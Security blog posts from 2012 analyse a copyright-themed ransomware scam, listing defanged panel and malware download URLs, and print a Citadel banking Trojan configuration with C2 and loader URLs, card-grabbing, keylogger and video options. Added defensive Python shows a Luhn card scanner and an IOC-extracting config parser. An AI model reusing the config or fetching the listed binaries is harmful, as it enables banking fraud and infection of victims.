Tuesday, 25 September 2012

Ransomware Trojan: intellectual property companies version


The ransomware Trojan has lately been very popular under the name "Police Trojan": after infection the user's machine appears locked, showing a fake police web page stating that the user is suspected of certain crimes and that the machine will remain locked until a penalty of a certain amount of money is paid.

This time a similar version of the ransomware Trojan has been found, using the same fraud technique but pretending that the victim has infringed copyright laws and demanding payment of the corresponding fine.

Once the user's computer has been infected, the Trojan redirects the user's browsing to the malicious URL:

hXXp://invalid-crew.com/start.php

This malicious script checks the language the user has configured in the browser and displays a fake web page in that language, impersonating the legitimate institutions of the user's country that protect copyright and intellectual property.

For Spanish users the Trojan redirects to the URL:

hXXp://invalid-crew.com/payz/iframe_ES.php

which shows the following screen, pretending to come from the SGAE (General Society of Authors and Editors), the Spanish authors' society:



For Portugal:  hXXp://invalid-crew.com/payz/iframe_PT.php


For Italy:  hXXp://invalid-crew.com/payz/iframe_IT.php




For France:  hXXp://invalid-crew.com/payz/iframe_FR.php


For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php


The domain invalid-crew.com is hosted on the IP 95.163.68.147, which belongs to the ISP Digital Networks CJSC in Russia.

The login screens for the ransomware Trojan's control panel were located at the addresses:

hXXp://invalid-crew.com/admin/login.php

And:

hXXp://invalid-crew.com/bull/login.php


The control panel of the ZEMRA botnet was also located at:

hXXp://invalid-crew.com/abc/admin/


This panel controls 5384 infected user machines, with a high percentage of Latin American users among the compromised machines.

According to the statistics menu, the malware began spreading on September 3, with the peak infection day being September 5, with 2402 infected computers.




The control panel also lets the operator follow the download tasks of the various malicious binaries on the zombie computers.


The infection vectors of the Trojans are still active:
  
hXXp://95.163.68.147/abc/rat.exe
hXXp://95.163.68.147/abc/rat1.exe
hXXp://95.163.68.147/abc/fud.exe
hXXp://95.163.68.147/abc/server.exe
hXXp://95.163.68.147/abc/cgg.exe

Sunday, 23 September 2012

Ransomware Trojan, SGAE version: Authors' Societies


The ransomware Trojan has lately been very popular under the name "Police Trojan", because after infection the victim's computer appeared locked, showing a fake police page stating that the user was suspected of certain crimes and that the computer would remain locked until a fine of a certain amount of money was paid.

This time a similar version has been located, using the same fraud technique but now pretending that the user has committed a copyright offence and requesting payment of the corresponding fine.

Once the user's computer has been infected, the Trojan redirects the user's browsing to the malicious link

hXXp://invalid-crew.com/start.php

which checks the language the user has configured in the browser in order to display the fake screen in the user's language, also impersonating the legitimate institutions of that country that protect copyright and intellectual property.

For Spanish users the Trojan leads to the address:

hXXp://invalid-crew.com/payz/iframe_ES.php

which shows the following screen, pretending to come from the SGAE:


For Portugal:  hXXp://invalid-crew.com/payz/iframe_PT.php



For Italy:  hXXp://invalid-crew.com/payz/iframe_IT.php




For France:  hXXp://invalid-crew.com/payz/iframe_FR.php



For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php


The domain invalid-crew.com is hosted on the IP 95.163.68.147, which belongs to the provider Digital Networks CJSC in Russia.

The login screens for the Trojan's control panel were located at the addresses:

hXXp://invalid-crew.com/admin/login.php

and

hXXp://invalid-crew.com/bull/login.php



The control panel of the ZEMRA botnet was also located at the address:

hXXp://invalid-crew.com/abc/admin/


This panel controls 5384 infected user computers, with a fairly high percentage of Latin American users whose machines are compromised.


According to the statistics menu that tracks infected bots, the malware started spreading on September 3, with the peak infection day being September 5, with 2402 infected computers:



This panel also shows the tracking of the download tasks of the various malicious binaries on the zombie users' computers.



The infection vectors of the Trojans are still active:
  
hXXp://95.163.68.147/abc/rat.exe
hXXp://95.163.68.147/abc/rat1.exe
hXXp://95.163.68.147/abc/fud.exe
hXXp://95.163.68.147/abc/server.exe
hXXp://95.163.68.147/abc/cgg.exe

Tuesday, 18 September 2012

Configuration file of the Citadel Builder 1.3.4.5 Trojan


This document presents the configuration file used by the Citadel Trojan, successor of the well-known Zeus banking Trojan. The file is used to build the malicious binary that infects users and that later communicates with the server hosting the whole criminal infrastructure.

Among the new features of this version is its modular configuration, which depends on the add-ons purchased on the black market.

One of these modules is CardSwipe (magnetic stripe), whose purpose is to capture all the credit card data needed to operate fraudulently with the cards.

In this configuration file the criminals have this option enabled:

  enable_luhn10_get 1
  enable_luhn10_post 1
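The CardSwipe options above make the bot parse GET and POST data with the Luhn (mod 10) check to pick out card numbers. The following is an added example, not code from the post or from Citadel: the same check used from the defender's side, a small DLP-style scanner that flags Luhn-valid card-length numbers in captured form data, as a proxy or IDS rule would. The field names and the form body are constructed.

```python
import re
from urllib.parse import parse_qsl


def luhn_valid(digits: str) -> bool:
    """Return True when an all-digit string passes the Luhn (mod 10) checksum.

    Starting from the rightmost digit, every second digit is doubled and
    9 is subtracted from doubled values above 9; the total must be a
    multiple of 10.
    """
    if not digits.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


# A PAN candidate: 13 to 19 digits, optionally separated by single spaces
# or dashes, and not embedded in a longer digit run.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def mask_pan(pan: str) -> str:
    """Keep the first six and last four digits so a hit can be logged
    without storing the full card number."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_form_data(body: str) -> list:
    """Parse a URL query string or x-www-form-urlencoded POST body and
    return (field, masked PAN) for every value holding a Luhn-valid
    card-length number. Digit runs that fail Luhn (order ids, phone
    numbers) are ignored, which is why the grabber applies the same
    check before reporting a value."""
    hits = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        for match in CANDIDATE_RE.finditer(value):
            digits = re.sub(r"[ -]", "", match.group(0))
            if 13 <= len(digits) <= 19 and luhn_valid(digits):
                hits.append((field, mask_pan(digits)))
    return hits


# Constructed sample POST body: the public Visa (4111...) and Mastercard
# (5500...) test numbers, plus decoys that are digit runs but not cards.
SAMPLE_POST = (
    "login=jdoe&cardnumber=4111111111111111&order=1234567890123456"
    "&phone=612-555-1234&cc=5500+0000+0000+0004"
)

if __name__ == "__main__":
    for field, masked in scan_form_data(SAMPLE_POST):
        print(f"card data in field {field!r}: {masked}")
```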

It was even possible to reproduce the injection the Trojan performs on the infected machine, capturing the screen it presents so that the user enters all of his credit card data when accessing online banking.




Note that it asks for the secret PIN number (ATM PIN) and the Social Security number (SSN), data that are never requested from the customer under any circumstances.

Other configuration parameters allow capturing video sequences from the infected computer:

  use_module_video 0
  entry "Video"
    quality 1
    length 500
  end

This is very useful for capturing, in real time, the sequence in which the user enters the secret transfer authorisation codes, and for evading virtual-keyboard authentication systems.

Other commands also allow capturing the data sent through the Chrome browser, enabling protection against virtual machines to prevent the binary from being analysed in those environments, disabling the sending of cookies, and blocking access to the websites of antivirus and anti-malware companies, redirecting the user to Google's home page (209.85.229.104) every time he tries to reach them. To do this it does not modify the infected computer's hosts file; instead it controls the computer's DNS cache.

It also blocks access to the pages of law enforcement and anti-cybercrime bodies.


Below is the configuration of Citadel Builder 1.3.4.5:




;; Default config + updated AV's list (redirect to google.com)
;; Citadel Builder 1.3.4.5
;; SHORT MANUAL BELOW ------------>
;; url_config1 is required!!! url_config2 & url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP : // logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; IF YOU DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.
;; <------------------ END OF SHORT MANUAL.

entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs  7 20
  timer_stats 10 20
  timer_modules 7 10
  timer_autoupdate 8
  url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"

  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0
end

entry "DynamicConfig"
  url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
  url_server "http : //gremlindefault.net/mainsession/redir.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
            "http : //gremlindefault.net/mainsession/game_install.bin"
  end
  entry "WebFilters"
    "!http : //*"
  end
  entry "WebDataFilters"
    ;"http : //mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http : //www.google.com" "http : //www.yahoo.com" "GP" "" ""
  end
  entry "DnsFilters"


  end
  entry "CmdList"
    "net view"
    "tasklist"
            "set"
  end
 
   entry "Keylogger"
    processes "calc___.exe"
    time 1
  end
 
  entry "Video"
    quality 1
    length 500
  end
end
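An added example, not the post's or the builder's code: a parser for the config grammar shown above (';' comments, nested entry/end blocks, key-value settings, quoted list items and host=ip DNS overrides) plus a triage helper that lists the config, loader and gate URLs, the sinkholed domains and the options that are switched on, so a recovered config can be turned into blocklist and detection input. The sample config is a constructed, shortened copy of the one in the post.

```python
import re
import shlex

ENTRY_RE = re.compile(r'^entry\s+"([^"]+)"$')

def _new_block() -> dict:
    # "_strings": bare quoted lines like "net view"; "_dns": host=ip overrides
    return {"_strings": [], "_dns": []}

def parse_citadel_config(text: str) -> dict:
    """Parse the builder config grammar shown in the post: ';' comments,
    'entry "Name"' ... 'end' blocks (nesting allowed), 'key value ...'
    settings, bare quoted strings as list items and 'host=ip' DNS lines.
    Returns nested dicts: block -> {setting: [values], child_block: {...}}."""
    root = _new_block()
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line == "end":
            if len(stack) > 1:          # ignore a stray 'end' at top level
                stack.pop()
            continue
        m = ENTRY_RE.match(line)
        if m:
            block = _new_block()
            stack[-1][m.group(1)] = block
            stack.append(block)
            continue
        current = stack[-1]
        if line.startswith('"'):
            current["_strings"].append(shlex.split(line))
        elif "=" in line and " " not in line:
            host, _, ip = line.partition("=")
            current["_dns"].append((host, ip))
        else:
            key, _, rest = line.partition(" ")
            current[key] = shlex.split(rest) if rest else []
    return root

def extract_iocs(cfg: dict) -> dict:
    """What an analyst wants first from a recovered config: config, loader
    and gate URLs, the domains the bot sinkholes, and which grabber or
    evasion options are switched on."""
    static = cfg.get("StaticConfig", _new_block())
    dynamic = cfg.get("DynamicConfig", _new_block())
    urls = []
    for key in ("url_config1", "url_config2", "url_config3"):
        urls += static.get(key, [])
    for key in ("url_loader", "url_server"):
        urls += dynamic.get(key, [])
    for item in dynamic.get("AdvancedConfigs", _new_block())["_strings"]:
        urls += item
    watched = ("enable_luhn10_get", "enable_luhn10_post", "use_module_video",
               "antiemulation_enable", "report_software")
    enabled = [k for k in watched if static.get(k, ["0"])[0] == "1"]
    return {
        "urls": list(dict.fromkeys(urls)),   # deduplicated, order kept
        "dns_sinkhole": dict(dynamic.get("DnsFilters", _new_block())["_dns"]),
        "enabled_options": enabled,
    }

# Constructed sample: a shortened copy of the config in the post, keeping
# the post's defanged "http : //" spelling.
SAMPLE_CONFIG = r'''
;; Default config + updated AV's list (redirect to google.com)
entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  use_module_video 0
end
entry "DynamicConfig"
  url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
  url_server "http : //gremlindefault.net/mainsession/redir.php"
  entry "AdvancedConfigs"
            "http : //gremlindefault.net/mainsession/game_install.bin"
  end
  entry "DnsFilters"
bitdefender.com=209.85.229.104
virustotal.com=209.85.229.104
www.interpol.int=209.85.229.104
  end
end
'''

if __name__ == "__main__":
    iocs = extract_iocs(parse_citadel_config(SAMPLE_CONFIG))
    for host, ip in iocs["dns_sinkhole"].items():
        print(f"{host} -> {ip} (security site sinkholed)")
    print("enabled options:", ", ".join(iocs["enabled_options"]))
```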